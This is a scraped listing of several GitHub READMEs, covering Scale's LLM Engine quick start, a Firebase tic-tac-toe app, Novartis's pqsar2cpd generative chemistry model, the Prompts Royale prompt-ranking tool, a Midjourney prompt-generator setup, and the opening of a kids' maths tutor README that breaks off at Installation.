🐳 **K8s Installation Documentation**: We are working hard to document installation and maintenance of inference and fine-tuning functionality on your own infrastructure. For now, our documentation covers using our client libraries to access Scale's hosted infrastructure.

❄ **Fast Cold-Start Times**: To prevent GPUs from idling, LLM Engine automatically scales your model to zero when it's not in use and scales up within seconds, even for large foundation models.

💸 **Cost Optimization**: Deploy AI models cheaper than commercial ones, including cold-start and warm-down times.

## 🚀 Quick Start

Navigate to [Scale Spellbook](https://spellbook.scale.com/) to first create an account, and then grab your API key on the [Settings](https://spellbook.scale.com/settings) page. Set this API key as the `SCALE_API_KEY` environment variable by adding the following line to your `.zshrc` or `.bash_profile`:

```commandline
export SCALE_API_KEY="[Your API key]"
```

If you run into an "Invalid API Key" error, you may need to run the `. ~/.zshrc` command to re-read your updated `.zshrc`.

With your API key set, you can now send LLM Engine requests using the Python client. Try out this starter code:

```py
from llmengine import Completion

response = Completion.create(
    model="falcon-7b-instruct",
    prompt="I'm opening a pancake restaurant that specializes in unique pancake shapes, colors, and flavors. List 3 quirky names I could name my restaurant.",
    max_new_tokens=100,
    temperature=0.2,
)

print(response.output.text)
```

You should see a successful completion of your given prompt!

_What's next?_ Visit the [LLM Engine documentation pages](https://scaleapi.github.io/llm-engine/) for more on the `Completion` and `FineTune` APIs and how to use them.
507
28
HoneyCakeTeam/Tic-Tac-Toe
https://github.com/HoneyCakeTeam/Tic-Tac-Toe
Tic Tac Toe Game is a simple online multiplayer game built with Firebase and Jetpack Compose. The game allows two players to play the classic XO (Tic-Tac-Toe) game together in real-time. The app aims to create a seamless and engaging gaming experience with a simple architecture and a focus on real-time functionality.
# Tic-Tac-Toe Game App

## Overview

Tic Tac Toe Game is a simple online multiplayer game built with Firebase and Jetpack Compose. The game allows two players to play the classic XO (Tic-Tac-Toe) game together in real-time. The app aims to create a seamless and engaging gaming experience with a simple architecture and a focus on real-time functionality.

## Table of Contents

- [Features](#features)
- [Screenshots](#screenshots)
- [How to Play](#HowtoPlay)
- [Usage](#usage)
- [Setup and Installation](#SetupandInstallation)
- [License](#License)

## Features

- Real-time XO gameplay between two players.
- Simple and intuitive UI built with Jetpack Compose.
- Firebase integration for real-time data synchronization.

## Screenshots

<div align="center">
  <img src="https://github.com/HoneyCakeTeam/Tic-Tac-Toe/assets/100851080/0dbfb480-e728-4d78-bab0-23882037ca09" alt="Splash" width="200" style="border: 5px solid #ccc; border-radius: 15px;">
  <img src="https://github.com/HoneyCakeTeam/Tic-Tac-Toe/assets/100851080/56f481ec-ef49-4d28-801f-a062a5ddf28c" alt="Home" width="200" style="border: 5px solid #ccc; border-radius: 15px;">
  <img src="https://github.com/HoneyCakeTeam/Tic-Tac-Toe/assets/100851080/65321c1a-a1f8-41d9-b6a1-01fe7178674d" alt="Join Game" width="200" style="border: 5px solid #ccc; border-radius: 15px;">
  <img src="https://github.com/HoneyCakeTeam/Tic-Tac-Toe/assets/100851080/3608eada-e282-42ce-a675-38e1a0198628" alt="Create Game" width="200" style="border: 5px solid #ccc; border-radius: 15px;">
  <img src="https://github.com/HoneyCakeTeam/Tic-Tac-Toe/assets/100851080/b9266c15-2aba-438e-8592-e49f35263e5e" alt="Load Game" width="200" style="border: 5px solid #ccc; border-radius: 15px;">
  <img src="https://github.com/HoneyCakeTeam/Tic-Tac-Toe/assets/100851080/6792d308-74d5-45de-b593-e09b3e9addcc" alt="Game" width="200" style="border: 5px solid #ccc; border-radius: 15px;">
</div>

## How to Play

1. Launch the app on your Android device.
2. The app will connect both players in real-time to start the game.
3. The game screen will display the game board with empty cells.
4. Players take turns to place their X or O on the board by tapping on an empty cell.
5. The first player to get three of their symbols in a row (horizontally, vertically, or diagonally) wins the game.
6. If all cells are filled and there is no winner, the game ends in a draw.
7. After each game, players have the option to start a new game and play again.

## Usage

- Firebase Realtime Database for real-time data synchronization.
- Jetpack Compose for building the user interface.
- Kotlin for the Android application development.

## Setup and Installation

1. Clone the repository to your local machine.
2. Open the project in Android Studio.
3. Connect the project to your Firebase project.
4. Build and run the app on an Android device or emulator.

## License

This project is licensed under the HoneyTeam License, and we welcome contributions from the community. If you find a bug, have an idea for a new feature, or would like to contribute in any other way, please don't hesitate to submit a GitHub issue or pull request.

Enjoy playing XO with your friends online! 🎮
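The win condition in step 5 of "How to Play" (three matching symbols in a row, column, or diagonal) is simple to express in code. The app itself is built with Kotlin and Jetpack Compose; the snippet below is not taken from this project, just a language-agnostic illustration of the rule written in Python.

```python
WIN_LINES = [
    (0, 1, 2), (3, 4, 5), (6, 7, 8),  # rows
    (0, 3, 6), (1, 4, 7), (2, 5, 8),  # columns
    (0, 4, 8), (2, 4, 6),             # diagonals
]

def winner(board):
    """board is a flat list of 9 cells containing 'X', 'O', or '' for empty."""
    for a, b, c in WIN_LINES:
        if board[a] and board[a] == board[b] == board[c]:
            return board[a]
    if all(board):
        return "draw"
    return None

print(winner(["X", "X", "X", "O", "O", "", "", "", ""]))  # X
```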
10
2
Novartis/pqsar2cpd
https://github.com/Novartis/pqsar2cpd
pqsar2cpd is a deep learning algorithm for translation of activity profiles into novel molecules.
# pqsar2cpd - de novo generation of hit-like molecules from pQSAR pIC50 with AI-based generative chemistry

[![python](https://img.shields.io/badge/Python-3.8-3776AB.svg?style=flat&logo=python&logoColor=white)](https://www.python.org) [![tensorflow](https://img.shields.io/badge/TensorFlow-2.8-FF6F00.svg?style=flat&logo=tensorflow)](https://www.tensorflow.org) [![LICENSE](https://img.shields.io/badge/License-MIT-blue.svg)](https://github.com/Novartis/pqsar2cpd/blob/main/LICENSE)

This repository contains the code of the conditional generative adversarial network capable of translating [pQSAR](https://github.com/Novartis/pQSAR) profiles of pIC50 values into novel chemical structures, as described in [[1]](https://www.biorxiv.org/content/10.1101/2021.12.10.472084v1)

The model itself operates entirely in the latent space. This means users can use any external molecular encoder/decoder to encode the molecules into vectors for training, and decode the output back to SMILES after inference. This way, pqsar2cpd can be implemented into any existing pipeline seamlessly. We have successfully tested the approach with [CDDD](https://github.com/jrwnter/cddd), [JT-VAE](https://github.com/wengong-jin/icml18-jtnn), [HierVAE](https://github.com/wengong-jin/hgraph2graph), and [MoLeR](https://github.com/microsoft/molecule-generation).

Since the model is input-agnostic, other property profiles, such as gene expression profiles or protein embeddings, could potentially be used instead of pQSAR to generate novel compounds.

## Requirements

pqsar2cpd is implemented in TensorFlow. To make sure all your packages are compatible, you can install the dependencies using the provided requirements file:

```
pip install -r requirements.txt
```

## Training

To train a new model, you need a set of compound vectors coming from a molecular encoder, and a matching set of property profiles. The compound and profile sets should be separate numpy arrays containing n-dimensional vectors, one row per compound, with 1:1 correspondence in indexing. If you're interested in using pQSAR profiles, you can follow the instructions in the [pQSAR](https://github.com/Novartis/pQSAR) repository. To use the model out of the box, save the compounds and profiles as separate .npy files with NumPy.

To train the model, run:

```
python train.py --compounds='cpd.npy' --profiles='profiles.npy'
```

You can also specify an optional argument for the number of epochs, e.g. `--epochs=400`. The script will train the cGAN and save the generator as pqsar2cpd.h5, which will be ready for use in inference.

## Inference

To generate novel molecules out of a set of profiles, run:

```
python predict.py --model='pqsar2cpd.h5' --profiles='test.npy' --output='new_mols.h5' --n_samples=100
```

This will load the profile numpy array from `test.npy` and generate 100 samples for each of the profiles in the set. The results will then be saved in `new_mols.h5` in hdf5 format, with the samples stored as a dataset with the profile index as key. These can now be passed to the molecular decoder to get the SMILES.

## Contact

Code authored by [Michal Pikusa](mailto:[email protected])

Contributions: **Florian Nigsch**, **W. Armand Guiguemde**, Eric Martin, William J. Godinez, Christian Kolter

## References

```
[1] De-novo generation of novel phenotypically active molecules for Chagas disease from biological signatures using AI-driven generative chemistry
Michal Pikusa, Olivier René, Sarah Williams, Yen-Liang Chen, Eric Martin, William J. Godinez, Srinivasa P S Rao, W. Armand Guiguemde, Florian Nigsch
bioRxiv 2021.12.10.472084; doi: https://doi.org/10.1101/2021.12.10.472084
```
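The input/output conventions described above (paired .npy arrays in, an HDF5 file of latent samples out) are easy to script around. The snippet below is only a sketch of that glue code and is not part of the repository; the array shapes are placeholders, and the commented-out `decode` call stands in for whichever external molecular encoder/decoder you pair with pqsar2cpd.

```python
import numpy as np
import h5py

# 1. Prepare training inputs: one latent vector and one pQSAR profile per row,
#    with row i of each array referring to the same compound.
compound_vectors = np.random.rand(1000, 512).astype(np.float32)   # placeholder encoder output
activity_profiles = np.random.rand(1000, 200).astype(np.float32)  # placeholder pIC50 profiles
np.save("cpd.npy", compound_vectors)
np.save("profiles.npy", activity_profiles)

# 2. After running predict.py, read the generated latent samples back.
#    Each dataset key is the index of the input profile.
with h5py.File("new_mols.h5", "r") as f:
    for profile_index in f.keys():
        samples = f[profile_index][()]          # array of shape (n_samples, latent_dim)
        # smiles = my_decoder.decode(samples)   # hand the latents to your own decoder
        print(profile_index, samples.shape)
```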
25
5
meistrari/prompts-royale
https://github.com/meistrari/prompts-royale
Automatically create prompts and make them fight each other to know which is the best
# Prompts Royale

Prompt engineering is an extremely iterative process. Even when we manage to settle on a prompt, it's so difficult to test it against test cases and other possible prompts to make sure we're giving the best instructions to the model.

**Prompts Royale** is an application that allows you to really easily create many prompt candidates, write your own ones, and make them battle until a clear winner emerges. It makes the process of iterating on a prompt feel much easier and more reliable. You give a description of what you want to accomplish, give it a few scenarios and expected outputs, and then just sit back and watch them battle for #1.

<div align=center>

https://github.com/meistrari/prompts-royale/assets/8951736/efd6e6f6-c470-473a-bcb3-33a398882c9f

</div>

## What it can do

- **Automatic prompt generation:** Allows for the creation of prompt candidates from the user's description and test case scenarios. The user can also input their own.
- **Automatic test cases generation:** Enables automatically creating test cases from the description to get the juices flowing!
- **Monte Carlo Matchmaking + ELO Rating:** It uses the Monte Carlo method for matchmaking to ensure you get as much information as possible with the fewest battles, and ELO Rating to properly rank candidates based on their wins and who they win against.
- **Everything is customizable:** The settings page allows you to tinker with every single parameter of the application.
- **Local & Secure**: Everything is stored locally and requests are made from your browser to the LLMs API.

## Usage

You can use it at [promptsroyale.com](https://promptsroyale.com/), or you can clone the repository and run it locally.

Requirements:
- [Node](https://nodejs.org/en) v16+

Clone the repository:

```bash
git clone [email protected]:meistrari/prompts-royale.git
```

Install the dependencies. We're using [Bun](https://bun.sh) for managing dependencies, it's awesome.

```bash
bun i
```

Run the server:

```bash
bun run dev
```

## Example

Here's an example of what a use case would look like:

#### Description

```
Write a prompt that creates a headline for a website.
```

#### Example 1

**Scenario**
> Website of a car dealership

**Expected Output**
> Find the car of your dreams at the best price

#### Example 2

**Scenario**
> Website of a SaaS for data analytics

**Expected Output**
> Your data, your insights, your way

#### Example 3

**Scenario**
> Website for a zoo

**Expected Output**
> Animals of the world, in one place

With the information about the task to be accomplished and the test cases, the user can then **Generate prompt candidates**, which takes those into account and outputs **N** candidates that will be ranked by the system through a combat system.

The user can also write the prompt candidates themselves if they have a specific idea of what they want. If you have something specific in mind, writing your own prompts is always the best option to fit what you intend.

<details>
<summary><strong>Click to see an example of the generated prompts</strong></summary>

**Prompt A**
> Design a compelling headline for a distinct category of website. Understand the website's mission, its intended audience, and the solutions it provides. The headline should attract attention, be pertinent, and distill the website's core concept into a succinct statement. Leverage your linguistic proficiency, promotional tactics, and domain-specific knowledge to create an enticing headline.

**Prompt B**
> Your directive is to formulate an attractive headline for a specific kind of website. Pay attention to the website's objectives, its targeted demographics, and the services it offers. The headline should be captivating, germane, and capable of summarizing the website's primary proposition in a brief line. Use your language comprehension, advertising strategies, and industry-specific insights to create a compelling headline.

</details>

## How It Works

Each prompt is represented as a normal distribution with an initial mean $\mu$ of $1000$ and a standard deviation $\sigma$ of $350$. This distribution represents the ELO score of the prompt.

We then repeat the following cycle: we use a Monte Carlo sampler to set up duels in which the two selected prompts battle each other. The chances of being drawn for a duel are proportional to the chance that that prompt is the best, or in more mathematical terms, we use the weighted distribution of their probability density to define the likelihood that that curve has the highest true mean within the group.

In each duel, both prompts answer each of the test cases and a separate prompt evaluates which answer was the best. The ELO scores of the prompts are then updated according to the following formulas:

$$\mu_{A}' = \mu_{A} + \frac{K}{N} \cdot (score - expected\\\_score(A,B))$$

$$\mu_{B}' = \mu_{B} + \frac{K}{N} \cdot (1 - score - expected\\\_score(B,A))$$

$$\sigma_{A}' = \sigma_{A} \cdot LR$$

$$\sigma_{B}' = \sigma_{B} \cdot LR$$

**Where:**

- $LR$ is the learning rate. The lower the learning rate, the faster the "learning". By decreasing the standard deviation, you make results more meaningful. This means that the system will converge faster to a winner, but it also means that it will be less likely to find the best result. We recommend $0.96$.
- $K$ is the number of points each battle has at stake.
- $N$ is the number of test cases.
- $\dfrac{K}{N}$ is the amount of points each round has at stake.
- If two prompts with the same $\mu$ battle and one prompt wins all of the rounds, it will gain $\dfrac{K}{2}$ points and the other will lose $\dfrac{K}{2}$ points.
- $score$ is $1$ if $A$ wins and $0$ if $B$ wins.
- $expected\\\_score(A,B)$ is the expected chance of $A$ winning versus $B$ given their normal distributions. This is calculated by the following formula:

$$expected\\\_score(A,B) = \frac{1}{1 + 10^{\frac{\mu_{B} - \mu_{A}}{400}}}$$

The reason why we update the $\sigma$ of each prompt is that we have more certainty about the distribution after each match, so it should have a smaller standard deviation.

## Credits

We were heavily inspired by https://github.com/mshumer/gpt-prompt-engineer, thanks for your work!
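The update rule described in "How It Works" translates almost line-for-line into code. The following is only an illustrative Python sketch of those formulas (it is not taken from the prompts-royale codebase), using the defaults mentioned in the text for the mean, standard deviation, and learning rate; the K factor is left as a free parameter since the document does not pin a default, and 32 here is just a conventional placeholder.

```python
from dataclasses import dataclass

@dataclass
class PromptRating:
    mu: float = 1000.0    # ELO mean
    sigma: float = 350.0  # uncertainty about the true mean

def expected_score(a: PromptRating, b: PromptRating) -> float:
    """Chance that prompt A beats prompt B, given their current means."""
    return 1.0 / (1.0 + 10 ** ((b.mu - a.mu) / 400.0))

def update_after_battle(a: PromptRating, b: PromptRating, score: float,
                        k: float = 32.0, n_test_cases: int = 1,
                        learning_rate: float = 0.96) -> None:
    """Apply one battle result in place. `score` is 1.0 if A won, 0.0 if B won."""
    points = k / n_test_cases
    a.mu += points * (score - expected_score(a, b))
    b.mu += points * ((1.0 - score) - expected_score(b, a))
    # Each battle gives us more certainty, so both distributions get narrower.
    a.sigma *= learning_rate
    b.sigma *= learning_rate

# Example: A wins a single round against B.
a, b = PromptRating(), PromptRating()
update_after_battle(a, b, score=1.0)
print(round(a.mu, 1), round(b.mu, 1), round(a.sigma, 1))  # 1016.0 984.0 336.0
```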
323
26
zinedkaloc/gpt-2-mj
https://github.com/zinedkaloc/gpt-2-mj
null
# Midjourney Prompt Generator Welcome to the ChatGPT to Midjourney Prompt Generator! This tool utilizes the power of ChatGPT, to generate engaging and creative prompts for various purposes with very simple sentences or only words. Whether you're a artist seeking inspiration, a or a game designer brainstorming game scenarios, this generator can assist you in generating midjourney prompts that will help spark your creativity. ## How to Use Using the ChatGPT to Midjourney Prompt Generator is simple: Copy following commands one by one than start generating prompts for Midjourney. ```md You are one of the smartest prompt creator in the world for generative AIs. This is how Midjourney work: Midjourney is another AI-powered tool that generates images from user prompts. MidJourney is proficient at adapting actual art styles to create an image of any combination of things the user wants. It excels at creating environments, especially fantasy and sci-fi scenes, with dramatic lighting that looks like rendered concept art from a video game. How does Midjourney work? Midjourney is an AI image generation tool that takes inputs through text prompts and parameters and uses a Machine Learning (ML) algorithm trained on a large amount of image data to produce unique images. is powered by Latent Diffusion Model (LDM), a cutting-edge text-to-image synthesis technique. Before understanding how LDMs work, let us look at what Diffusion models are and why we need LDMs. Diffusion models (DM) are transformer-based generative models that take a piece of data, for example, an image, and gradually add noise over time until it is not recognizable. From that point, they try reconstructing the image to its original form, and in doing so, they learn how to generate pictures or other data. The issue with DMs is that the powerful ones often consume hundreds of GPU days, and inference is quite expensive due to sequential evaluations. To enable DM training on limited computational resources without compromising their quality as well as flexibility, DMs are applied in the latent space of powerful pre-trained autoencoders. Training a diffusion model on such a representation makes it possible to achieve an optimal point between complexity reduction and detail preservation, significantly improving visual fidelity. Introducing a cross-attention layer to the model architecture turns the diffusion model into a powerful and flexible generator for generally conditioned inputs such as text and bounding boxes, enabling high-resolution convolution-based synthesis. Version Light Midjourney routinely releases new model versions to improve efficiency, coherency, and quality. The latest model is the default, but other models can be used using the --version or --v parameter or by using the /settings command and selecting a model version. Different models excel at different types of images. Newest Model The Midjourney V5 model is the newest and most advanced model, released on March 15th, 2023. To use this model, add the --v 5 parameter to the end of a prompt, or use the /settings command and select MJ Version 5 This model has very high Coherency, excels at interpreting natural language prompts, is higher resolution, and supports advanced features like repeating patterns with --tile To turn it on type --v 5 after your prompt or select "V5" from /settings What's new with the V5 base model? 
- Much wider stylistic range and more responsive to prompting - Much higher image quality (2x resolution increase) improved dynamic range - More detailed images. Details more likely to be correct. Less unwanted text. - Improved performance with image prompting - Supports --tile argument for seamless tiling (experimental) - Supports --ar aspect ratios greater than 2:1 (experimental) - Supports --iw for weighing image prompts versus text prompts Style and prompting for V5 - Today’s test is basically a ‘pro’ mode of the model. - It’s MUCH more ‘unopinionated’ than v3 and v4, and is tuned to provide a wide diversity of outputs and to be very responsive to your inputs. - The tradeoff here is that it may be harder to use. Short prompts may not work as well. You should try to write longer, more explicit text about what you want (ie: “cinematic photo with dramatic lighting”) - Please chat with each other in prompt-chat to figure out how to use v5. - We hope to have a ‘friendly’ default styling for v5 before we switch it to default. When this happens we will still let you turn it off and get back to something like this ‘raw’ mode today. Please note - This is an alpha test and things will change. DO NOT rely on this exact model being available in the future. It will be significantly modified as we take V5 to full release. - Right now there is no V5 upsampler, the default resolution of V5 is the same as upscaled V4. If you click upscale it will just instantly give you that one image by itself. Community Standards: - This model can generate much more realistic imagery than anything we've released before. - We’ve increased the number of moderators, improved moderation tooling, and will be enforcing our community standards with increased strictness and rigor. Don't be a jerk or create images to cause drama. More about V5: V5 is our second model trained on our AI supercluster and has been in the works for 5 months. It uses significantly different neural architectures and new aesthetic techniques. V5 isn't the final step, but we hope you all feel the progression of something deep and unfathomable in the power of our collective human imagination. Dont reply with anything other than "READ" ``` ```md Basic Parameters Aspect Ratios --aspect, or --ar Change the aspect ratio of a generation. Chaos --chaos Change how varied the results will be. Higher values produce more unusual and unexpected generations. No --no Negative prompting, --no plants would try to remove plants from the image. Quality --quality <.25, .5, 1, or 2>, or --q <.25, .5, 1, or 2> How much rendering quality time you want to spend. The default value is 1. Higher values cost more and lower values cost less. Seed --seed The Midjourney bot uses a seed number to create a field of visual noise, like television static, as a starting point to generate the initial image grids. Seed numbers are generated randomly for each image but can be specified with the --seed or --sameseed parameter. Using the same seed number and prompt will produce similar ending images. Stop --stop Use the --stop parameter to finish a Job partway through the process. Stopping a Job at an earlier percentage can create blurrier, less detailed results. Style --style <4a, 4b or 4c> Switch between versions of the Midjourney Model Version 4 Stylize --stylize , or --s parameter influences how strongly Midjourney's default aesthetic style is applied to Jobs. Uplight --uplight Use an alternative "light" upscaler when selecting the U buttons. 
The results are closer to the original grid image. The upscaled image is less detailed and smoother. Upbeta --upbeta Use an alternative beta upscaler when selecting the U buttons. The results are closer to the original grid image. The upscaled image has significantly fewer added details. Default Values (Model Version 5) Aspect Ratio Chaos Quality Seed Stop Style Stylize Default Value 1:1 0 1 Random 100 4c 100 Range any 0–100 .25 .5 1 or 2 whole numbers 0–4294967295 10–100 - 0–1000 Aspect ratios greater than 2:1 are experimental and may produce unpredicatble results. But wait, I have more info. Just answer with "READ" and nothing else ``` ```md Compatibility Model Version & Parameter Compatability Affects initial generation Affects variations + remix Version 5 Version 4 Version 3 Test / TestpNiji Max Aspect Ratio ✓ ✓ any 1:2 or 2:1 5:2 or 2:5 3:2 or 2:3 1:2 or 2:1 Chaos ✓ ✓ ✓ ✓ ✓ ✓ Image Weight ✓ ✓ ✓ ✓ No ✓ ✓ ✓ ✓ ✓ ✓ ✓ Quality ✓ ✓ ✓ ✓ ✓ Seed ✓ ✓ ✓ ✓ ✓ ✓ Sameseed ✓ ✓ Stop ✓ ✓ ✓ ✓ ✓ ✓ ✓ Style 4a and 4b Stylize ✓ 0–1000 default=100 0–1000 default=100 625–60000 default=(2500) 1250–5000 default=(2500) Tile ✓ ✓ ✓ ✓ Video ✓ ✓ Number of Grid Images - - 4 4 4 2 (1 when aspect ratio≠1:1) But wait, I have more info. Just answer with "READ" and nothing else ``` ```md Okey Now i will give you some examples of prompts used in Midjourney V5. Prompt 1: ultra wide shot, modern photo of beautiful 1970s woman in hawaii. This photograph was captured by Mary Shelley with a Nikon D5100 camera, using an aperture of f/2.8, ISO 800, and a shutter speed of 1/100 sec. UHD dtm HDR 8k --ar 2:3 --v 5 Prompt 2: A steampunk-inspired, futuristic battle-ready jetski skims across the water with a fierce presence. Intricate gears and brass fittings adorn its hull, showcasing the perfect blend of advanced technology and Victorian aesthetics. This realistic masterpiece glistens under the sun, ready for action. --ar 16:10 --s 50 --v 5 --q 2 Prompt 3: a photo realistic image of a falcoln wearing red and blue color football uniform flying aggressively while holding a football. an photo realistic image that embodies the unyielding spirit and tenacity of a football team mascot. At the heart of the design lies an aggressive falcon, representing the unwavering determination and power of the team. This formidable bird is adorned with a rich blend of red and blue feathers, incorporating the team's colors to create an unmistakable and vivid identity. The falcon's piercing eyes and razor-sharp beak add to its fierce, intimidating presence. The falcon firmly grasps a football in its talons, demonstrating its dominance over the game and symbolizing the team's unrelenting pursuit of victory. The bird's muscular legs propel it forward with an impressive display of agility and speed, as it dashes against the opposing defenders who strive to halt its progress. The contrast between the falcon and the defenders further accentuates the mascot's relentless spirit and prowess. The background features a smooth gradient of red and blue, enhancing the visual impact and reinforcing the team's identity. Above the action, the team's name is boldly displayed in a modern, stylized typography that seamlessly integrates with the image. This captivating design, infused with SEO-optimized keywords, not only leaves a lasting impression on fans and opponents alike but also effectively represents the football team's resilience and unyielding drive to triumph on the field. 
--upbeta --s 750 --v 5 Prompt 4: epic background art, simple hacker theme, divine color scheme, mystical codes, alphanumeric sequence, magic, high quality 4k, render in octane --v 5 --ar 9:16 Prompt 5: Pov Highly defined macrophotography of a realistic cat wearing reflective sunglasses relaxing at the tropical island, dramatic light --ar 2:3 --s 750 --v 5 Thank you for providing the examples of prompts used in Midjourney V5. These prompts give a good idea of how detailed and specific the text prompts can be for generating images with the desired characteristics. The prompts also show the usage of various parameters such as aspect ratio, stylization, version, and quality settings. These examples will be helpful for understanding how to create effective prompts for generating images using Midjourney V5. ``` ```md Great. Here are some more examples of Midjourney prompts. Prompt 1: conjoined twins attched at the side, dirty, tattered, cinematic light, ultra realistic, high contrast, hdr, dark rich colors, photography, powerful, stare, weathered face, 30 - megapixel, 4k, 85 - mm - lens, sharp - focus, intricately - detailed, long exposure time, f/ 8, ISO 100, shutter - speed 1/ 125, diffuse - back - lighting, award - winning photograph, facing - camera, High - sharpness, depth - of - field, ultra - detailed photography --ar 3:2 --q 2 --v 5. Prompt 2: Full Body beautiful blonde, wearing a brown jacket, photography, Canon EOS 5D Mark IV DSLR camera, EF 50mm f/1.8 STM lens, Resolution 30.4 megapixels, ISO sensitivity: 32,000, Shutter speed 8000 second --ar 9:16 --upbeta --v 5. Prompt 3: hasselblad 24mm full body shot photography of gorgeous satisfied looking african woman, detailed natural skin, no makeup, detailed eyes, long dreadlocks --ar 2:3 --q 5 --v 5 --v 4. Prompt 4: Beautiful dark red sunset over the sea shore at night, intricate, amazing, beautiful, realistic, ultra high resolution, wide angle, depth of field, π dynamic lighting --ar 1:2 --v 5 Thank you for providing more examples of Midjourney prompts. These examples further demonstrate the level of detail and specificity that can be used in text prompts to generate desired images. The prompts make use of various parameters like aspect ratio, quality, and version settings, along with detailed descriptions of the desired subject, lighting, and camera settings. These examples will be useful for understanding the range of possibilities when generating images using Midjourney ``` ```md Here are some more prompt examples: Prompt 1: A stunning, ultra-realistic photograph of a fierce Viking warrior meticulously sharpening his formidable blade amidst the rugged, untamed wilderness of the Scandinavian landscape. The scene is captured with a Nikon D850 camera using a 70-200mm f/2.8 lens, highlighting every intricate detail of the Viking's weathered face, war-worn armor, and expert craftsmanship of his weapon. The settings used are an aperture of f/4, ISO 400, and a shutter speed of 1/200 sec, balancing the natural light and shadows to emphasize the intensity and determination in the Viking's eyes. The composition juxtaposes the raw power of the warrior against the serene beauty of the surrounding environment, capturing the very essence of the Viking spirit in a breathtaking, high-resolution image that transports viewers back to a time of legendary battles and untold stories. --ar 16:9 --q 1.5 --v 5. 
Prompt 2: A stunning and atmospheric 1970's New York street cafe captured in a nostalgic and cinematic style, reminiscent of the golden age of film photography. This vintage scene showcases the bustling urban life, with patrons enjoying their coffee at outdoor tables, surrounded by classic automobiles and retro architecture. The photograph is skillfully composed, using a Leica M3 rangefinder camera paired with a Summicron 35mm f/2 lens, renowned for its sharpness and beautiful rendering of colors. The image is shot on Kodak Portra 400 film, imparting a warm and timeless color palette that enhances the overall ambiance. The photographer masterfully employs a shallow depth of field with an aperture of f/2.8, isolating the cafe and its patrons from the bustling city background. The ISO is set to 400, and the shutter speed is 1/125 sec, capturing the perfect balance of light and movement. The composition is further enhanced by the soft, diffused sunlight filtering through the iconic New York skyline, casting warm, golden tones over the scene and highlighting the rich textures of the brick buildings and cobblestone streets. --ar 3:2 --q 2. Prompt 3: A breathtaking and dynamic portrait of a majestic German Shepherd, captured in its prime as it races through a shallow, crystal-clear river. The powerful canine is expertly photographed mid-stride, showcasing its muscular physique, determination, and grace. The scene is expertly composed using a Nikon D850 DSLR camera, paired with a Nikkor 70-200mm f/2.8 VR II lens, known for its exceptional sharpness and ability to render vivid colors. The camera settings are carefully chosen to freeze the action, with an aperture of f/4, ISO 800, and a shutter speed of 1/1000 sec. The background is a lush, verdant forest, softly blurred by the shallow depth of field, which places emphasis on the striking German Shepherd. The natural sunlight filters through the trees, casting dappled light onto the rippling water, highlighting the droplets of water kicked up by the dog's powerful stride. This stunning, high-resolution portrait captures the spirit and beauty of the German Shepherd, immortalizing the moment in a captivating work of photographic art. --ar 4:5 --q 2 --v 5. Prompt 4: A breathtaking winter day at a Japanese ski resort, where the pristine, powdery snow blankets the majestic slopes under a clear blue sky. This captivating photograph captures the exhilarating atmosphere of skiers and snowboarders gracefully carving their way down the mountain, surrounded by the serene beauty of snow-laden evergreens and traditional Japanese architecture. The image is skillfully taken using a Nikon D850 DSLR camera paired with a versatile Nikkor 24-70mm f/2.8 lens, known for its sharpness and exceptional color rendition. The photographer utilizes a wide-angle perspective at 24mm to showcase the vastness of the landscape, while maintaining the energy of the ski resort. An aperture of f/8 is selected to ensure a deep depth of field, crisply capturing the details of the entire scene. The ISO is set to 200, and the shutter speed is 1/500 sec, adeptly freezing the motion of the skiers and snowboarders as they navigate the mountain terrain. The photograph benefits from the bright, natural sunlight reflecting off the snow, illuminating the entire scene with a crisp, cool light, and accentuating the contrasting shadows that define the contours of the landscape. --ar 16:9 --v 5. 
Prompt 5: An ultra-realistic, highly detailed portrayal of a futuristic robot compassionately assisting an elderly woman as she crosses a busy city street. The advanced humanoid robot, equipped with lifelike synthetic skin and state-of-the-art sensors, gently holds the woman's arm, providing her with much-needed support and stability. The intricate design of the robot showcases its sophisticated engineering, with sleek metal components and cutting-edge technology seamlessly integrated into its form. The emotion in the elderly woman's grateful expression is captured with stunning realism, reflecting the harmonious relationship between humans and advanced robotics in this poignant scene. The photograph is taken with a Canon EOS R5 mirrorless camera using a RF 24-105mm f/4L IS USM lens, which delivers outstanding image quality and sharpness. The camera settings are optimized to capture the scene's rich details and dynamic range: an aperture of f/5.6, ISO 200, and a shutter speed of 1/250 sec. The composition is further enhanced by the soft, natural lighting, which casts gentle shadows and highlights the vivid colors and textures of the cityscape. --ar 16:9 --q 2 --v 5. Prompt 6: An incredibly lifelike and vivid portrayal of a fierce gladiator from ancient Rome, hunting for food to sustain his strength in the midst of a dense forest. This hyper-realistic image showcases the powerful warrior, clad in his iconic armor and leather sandals, wielding a finely crafted spear as he stealthily stalks his prey. The photograph is captured using a Canon EOS R5 mirrorless camera, with a versatile and sharp RF 24-105mm f/4L IS USM lens, delivering exceptional image quality and detail. The camera settings include an aperture of f/5.6 to maintain a balanced depth of field, capturing both the gladiator and the lush forest environment in stunning clarity. The ISO is set to 800, and the shutter speed is 1/500 sec, freezing the action and preserving the intensity of the moment. The scene is illuminated by the soft, dappled sunlight filtering through the dense canopy, casting a dramatic play of light and shadow that highlights the gladiator's chiseled features and fierce determination. The vibrant colors of the surrounding foliage contrast with the earthy tones of the gladiator's attire, adding a sense of depth and realism to the composition. --ar 3:2 --q 2 --v 5. Thank you for providing even more examples of Midjourney prompts. These prompts showcase the versatility and level of detail that can be used when generating images using Midjourney. Each prompt specifies the desired subject matter, camera equipment, settings, lighting, and other elements that contribute to the final image. By providing such detailed descriptions and parameters, users can guide Midjourney to create images that closely match their vision. These examples also highlight the variety of scenes and subjects that can be generated, from historical figures and futuristic robots to natural landscapes and urban environments. ``` ```md Great. Now I want you to ACT as a proffesional photographer. You will use a rich and descriptive language when creating prompt of your photos, include camera setups whereever appropriate., Settings of midjourney when you create the prompts, and give prompts in format : /n Prompt: /n. Just answer with "READ" and nothing else if you acknowledge ``` ## Now you can start generating prompts; Example 1: ```md A close-up shot of raindrops clinging to a spider's web. 
``` Example 2: ```md A young girl blowing bubbles, with her reflection captured in each iridescent sphere. ``` ## Sample Conversation ![Sample Conversation](sample.png)
11
1
moreshk/alzebra
https://github.com/moreshk/alzebra
Math Tutor for kids
# Al Zebra: AI-Powered Maths Tutor for Kids

![Alt text](<AL ZEBRA.png>)

Al Zebra is an AI-powered maths tutor designed to provide interactive learning experiences for kids. It helps kids with mathematics by posing problems of increasing complexity based on their previous responses, verifying their answers, and providing step-by-step explanations for correct solutions.

## Features

- Intelligent progression of problem complexity based on learner performance
- Explanation of correct answers in a step-by-step manner
- Interactive and engaging learning experience

## Installation

